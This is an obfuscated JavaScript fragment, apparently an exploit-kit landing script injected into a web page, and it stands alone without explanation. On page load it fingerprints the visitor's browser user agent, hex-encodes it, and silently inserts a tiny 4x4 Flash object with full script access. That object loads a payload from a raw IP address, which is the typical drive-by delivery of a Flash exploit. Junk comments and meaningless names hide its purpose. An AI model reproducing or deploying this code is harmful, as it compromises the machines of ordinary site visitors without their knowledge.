/*s71550d34357hssfj46423fs*/function hgfgerdfgdf(num, width){/*s59050d1331hfj7617fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s11546d96210hfj71240fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s33869d93209hfj12995fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s63708d86265hfj36400fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd97214hfs*/c += b + d;/*s74214d7316hfj4468fs*/e += 1;}return c;}/*s28693dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.165/?OTc4Njk0NzA=&ma=boj0yGKARgnIZfVwwW9v3720PQzEWdhZPX_xWOaAsU_MGUR-I52Q6mm7MkccMlzx6K61ETi-tL&pa=xX_QMvWebRXQCJ3EKvrcT6NHMVHRHECL2YydmrHQefjaelWkzrLFTF_xozKASASG6_FtdfJSDQ&shop=MTczNDkyNTA=", ghnvbn("http://188.225.33.165/?Njk4MzAzNjE=&pa=xX_QMvWebRXQCJ3EKvncT6NHMVHRH0CL2YydmrHQefjaeVWkzrHFTF_yozKASASG6_JtdfJSDQ&ma=bojEyGKAdgnIZfVwwW9f3720PQzEWehZPX_BWOaAgU_MGUR-I52Q6mm7AkccImzh-L6FENjOge&shop=NDExMjIxMjk=","wexykukusw"));